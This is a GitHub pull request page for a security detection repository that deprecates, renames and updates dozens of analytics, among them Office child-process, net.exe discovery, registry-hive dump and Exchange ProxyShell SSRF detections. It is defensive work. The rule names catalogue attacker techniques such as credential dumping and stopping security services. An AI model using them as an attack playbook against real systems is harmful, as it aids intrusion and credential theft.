Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Multiple Rule Updates #3271

Merged
merged 49 commits into from
Jan 24, 2025
Merged

Multiple Rule Updates #3271

merged 49 commits into from
Jan 24, 2025

Conversation

nasbench
Copy link
Contributor

@nasbench nasbench commented Jan 8, 2025
edited
Loading

This PR introduces multiple changes and updates to the following analytics.

Deprecated Analytics

Office Analytics

The following analytics related to misuse of office products, were deprecated in favor of a more generic approach. This is in order to ease management of the rule. Instead of managing 13~ or so rules, now we can deal with a single source of truth with a defined macro that can be updated to add additional office processes.

  • Winword Spawning Windows Script Host / 637e1b5c-9be1-11eb-9c32-acde48001122
  • Winword Spawning PowerShell / b2c950b8-9be2-11eb-8658-acde48001122
  • Winword Spawning Cmd / 6fcbaedc-a37b-11eb-956b-acde48001122
  • Office Product Spawning Wmic / ffc236d6-a6c9-11eb-95f1-acde48001122
  • Office Product Spawning Windows Script Host / b3628a5b-8d02-42fa-a891-eebf2351cbe1
  • Office Product Spawning MSHTA / 6078fa20-a6d2-11eb-b662-acde48001122
  • Office Product Spawning CertUtil / 6925fe72-a6d5-11eb-9e17-acde48001122
  • Office Product Spawning BITSAdmin / e8c591f4-a6d7-11eb-8cf7-acde48001122
  • Office Product Spawn CMD Process / b8b19420-e892-11eb-9244-acde48001122
  • Office Application Spawn rundll32 process / 958751e4-9c5f-11eb-b103-acde48001122
  • Office Application Spawn Regsvr32 process / 2d9fc90c-f11f-11eb-9300-acde48001122
  • Excel Spawning Windows Script Host / 57fe880a-9be3-11eb-9bf3-acde48001122
  • Excel Spawning PowerShell / 42d40a22-9be3-11eb-8f08-acde48001122

The above were replaced by Windows Office Product Spawned Uncommon Process / 55d8741c-fa32-4692-8109-410304961eb8. This rule groups all of these child processes into a single analytic.

Account Discovery With Net App / 339805ce-ac30-11eb-b87d-acde48001122

This analytic was a TTP that focused on unrelated things and called account discovery. Since there were other detection that overlapped with it. I choose to deprecate it, and replace it with an updated version of 339805ce-ac30-11eb-b87d-acde48001122 / Windows Excessive Usage Of Net App.

Attempted Credential Dump From Registry via Reg exe / e9fb4a59-c5fb-440a-9f24-191fbc6b2911

This analytic overlapped had some overlap with another one, hence the deprecation. It was replaced by 8bbb7d58-b360-11eb-ba21-acde48001122 / Windows Sensitive Registry Hive Dump Via CommandLine

Detect Critical Alerts from Security Tools / 483e8a68-f2f7-45be-8fc9-bf725f0e22fd

As discussed internally, this analytic was too generic for an analyst to do anything with it. It was deprecated in favor of the more specific approach provided by analytics such as Microsoft Defender ATP Alerts and Microsoft Defender Incident Alerts. Going forward analytics from leveraging alerts from vendors will have their specific analytics.

Domain Account Discovery With Net App / 98f6a534-04c2-11ec-96b2-acde48001122

This analytic was a TTP that looked only for commands that tries to query info about the users via net user /do. This had a couple of issues, such as triggering on creation of users via the /add flag etc..

It was deprecated in favor of a more tighter approach in 5d0d4830-0133-11ec-bae3-acde48001122

Domain Group Discovery With Net / f2f14ac7-fa81-471a-80d5-7eb65c3c7349

Net Localgroup Discovery / 54f5201e-155b-11ec-a6e2-acde48001122

Both of these analytics were deprecated in favor of c5c8e0f3-147a-43da-bf04-4cfaec27dc44 / Windows Group Discovery Via Net

Remote System Discovery with Net / 9df16706-04a2-41e2-bbfe-9b38b34409d3

This analytic was focusing on 2 separate and unrelated type of threats or actions. It was split into other analytics, namely:

  • Windows Network Share Interaction With Net / 4dc3951f-b3f8-4f46-b412-76a483f72277
  • Windows Sensitive Group Discovery With Net / a23a0e20-0b1b-4a07-82e5-ec5f70811e7a

Renamed Analytics

  • Attempt To Stop Security Service -> Windows Attempt To Stop Security Service
  • Change Default File Association -> Windows New Default File Association Value Set
  • Cmdline Tool Not Executed In CMD Shell -> Windows Cmdline Tool Execution From Non-Shell Process
  • Create local admin accounts using net exe -> Windows Create Local Administrator Account Via Net
  • Detect processes used for System Network Configuration Discovery -> Potential System Network Configuration Discovery Activity
  • Elevated Group Discovery With Net -> Windows Sensitive Group Discovery With Net
  • Excessive Service Stop Attempt -> Windows Excessive Service Stop Attempt
  • Excessive Usage Of Net App -> Windows Excessive Usage Of Net App
  • Extraction of Registry Hives -> Windows Sensitive Registry Hive Dump Via CommandLine
  • Linux Auditd Find Private Keys -> Linux Auditd Private Keys and Certificate Enumeration
  • MSHTML Module Load in Office Product -> Windows Office Product Loaded MSHTML Module
  • Network Connection Discovery With Net -> Windows Network Connection Discovery Via Net
  • Office Document Creating Schedule Task -> Windows Office Product Loading Taskschd DLL
  • Office Document Executing Macro Code -> Windows Office Product Loading VBE7 DLL
  • Office Document Spawned Child Process To Download -> Windows Office Product Spawned Child Process For Download
  • Password Policy Discovery with Net -> Windows Password Policy Discovery with Net
  • Windows Command Shell Fetch Env Variables -> Windows List ENV Variables Via SET Command From Uncommon Parent
  • Windows Modify Registry Reg Restore -> Windows Registry Entries Restored Via Reg
  • Windows MSIExec With Network Connections -> Windows HTTP Network Communication From MSIExec
  • Windows Network Share Interaction With Net -> Windows Network Share Interaction Via Net
  • Office Product Writing cab or inf -> Windows Office Product Dropped Cab or Inf File
  • Office Application Drop Executable -> Windows Office Product Dropped Uncommon File
  • Office Spawning Control -> Windows Office Product Spawned Control
  • Windows Office Product Spawning MSDT -> Windows Office Product Spawned MSDT
  • Office Product Spawning Rundll32 with no DLL -> Windows Office Product Spawned Rundll32 With No DLL
  • Windows Query Registry Reg Save -> Windows Registry Entries Exported Via Reg
  • Windows Service Stop Via Net and SC Application -> Windows Service Stop Attempt
  • Windows Valid Account With Never Expires Password -> Windows Set Account Password Policy To Unlimited Via Net
  • Detect Webshell Exploit Behavior -> Windows Suspicious Child Process Spawned From WebServer
  • Deleting Of Net Users -> Windows User Deletion Via Net
  • Disabling Net User Account -> Windows User Disabled Via Net
  • Local Account Discovery with Net -> Windows User Discovery Via Net

Updated Analytics

Auditd Analytics

All Auditd analytics leveraging the data source Linux Auditd Execve have been updated to include a rename that will help with the integration with ES. Namely rename comm as process_name | rename exe as process

Other

  • detections/endpoint/linux_auditd_private_keys_and_certificate_enumeration.yml
  • detections/endpoint/potential_system_network_configuration_discovery_activity.yml
  • detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml
  • detections/endpoint/windows_attempt_to_stop_security_service.yml
  • detections/endpoint/windows_cmdline_tool_execution_from_non_shell_process.yml
  • detections/endpoint/windows_create_local_administrator_account_via_net.yml
  • detections/endpoint/windows_excessive_service_stop_attempt.yml
  • detections/endpoint/windows_excessive_usage_of_net_app.yml
  • detections/endpoint/windows_group_discovery_via_net.yml
  • detections/endpoint/windows_http_network_communication_from_msiexec.yml
  • detections/endpoint/windows_list_env_variables_via_set_command_from_uncommon_parent.yml
  • detections/endpoint/windows_network_connection_discovery_via_net.yml
  • detections/endpoint/windows_network_share_interaction_via_net.yml
  • detections/endpoint/windows_new_default_file_association_value_set.yml
  • detections/endpoint/windows_office_product_dropped_cab_or_inf_file.yml
  • detections/endpoint/windows_office_product_dropped_uncommon_file.yml
  • detections/endpoint/windows_office_product_loaded_mshtml_module.yml
  • detections/endpoint/windows_office_product_loading_taskschd_dll.yml
  • detections/endpoint/windows_office_product_loading_vbe7_dll.yml
  • detections/endpoint/windows_office_product_spawned_child_process_for_download.yml
  • detections/endpoint/windows_office_product_spawned_control.yml
  • detections/endpoint/windows_office_product_spawned_msdt.yml
  • detections/endpoint/windows_office_product_spawned_rundll32_with_no_dll.yml
  • detections/endpoint/windows_office_product_spawned_uncommon_process.yml
  • detections/endpoint/windows_password_policy_discovery_with_net.yml
  • detections/endpoint/windows_registry_entries_exported_via_reg.yml
  • detections/endpoint/windows_registry_entries_restored_via_reg.yml
  • detections/endpoint/windows_sensitive_group_discovery_with_net.yml
  • detections/endpoint/windows_sensitive_registry_hive_dump_via_commandline.yml
  • detections/endpoint/windows_service_stop_attempt.yml
  • detections/endpoint/windows_set_account_password_policy_to_unlimited_via_net.yml
  • detections/endpoint/windows_suspicious_child_process_spawned_from_webserver.yml
  • detections/endpoint/windows_user_deletion_via_net.yml
  • detections/endpoint/windows_user_disabled_via_net.yml
  • detections/endpoint/windows_user_discovery_via_net.yml
  • detections/web/windows_exchange_autodiscover_ssrf_abuse.yml

@nasbench nasbench added the WIP DO NOT MERGE Work in Progress label Jan 8, 2025
@josehelps josehelps added the 5.0 label Jan 16, 2025
@josehelps josehelps added this to the v5.0.0 milestone Jan 16, 2025
@MHaggis
Update windows_exchange_autodiscover_ssrf_abuse.yml
8ce3783 
- Updated detection description to better explain ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) attack patterns
- Enhanced search query:
  - X-Rps-CAT parameter
  - Suspicious user agent strings
@patel-bhavin
Copy link
Contributor

@nasbench , for consistency : i think the detections that are now status: deprecated, we should move those files to the deprecated folder in the detections/ directory! That may also help with the build related errors on this CI

@nasbench nasbench marked this pull request as ready for review January 23, 2025 14:35
@patel-bhavin
Copy link
Contributor

the detection passed on the second attempt in the CI

@patel-bhavin patel-bhavin merged commit eaa2880 into develop Jan 24, 2025
3 of 4 checks passed
@patel-bhavin patel-bhavin deleted the major-updates branch January 24, 2025 18:15
@patel-bhavin patel-bhavin removed WIP DO NOT MERGE Work in Progress Playbooks labels Jan 24, 2025
@nasbench nasbench mentioned this pull request Jan 24, 2025
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@ljstella ljstella ljstella left review comments

@patel-bhavin patel-bhavin Awaiting requested review from patel-bhavin patel-bhavin is a code owner

Assignees
No one assigned
Labels
5.0 Detections Lookups Macros
Projects
None yet
Milestone
v5.0.0
Development

Successfully merging this pull request may close these issues.
5 participants
@nasbench @patel-bhavin @ljstella @josehelps @MHaggis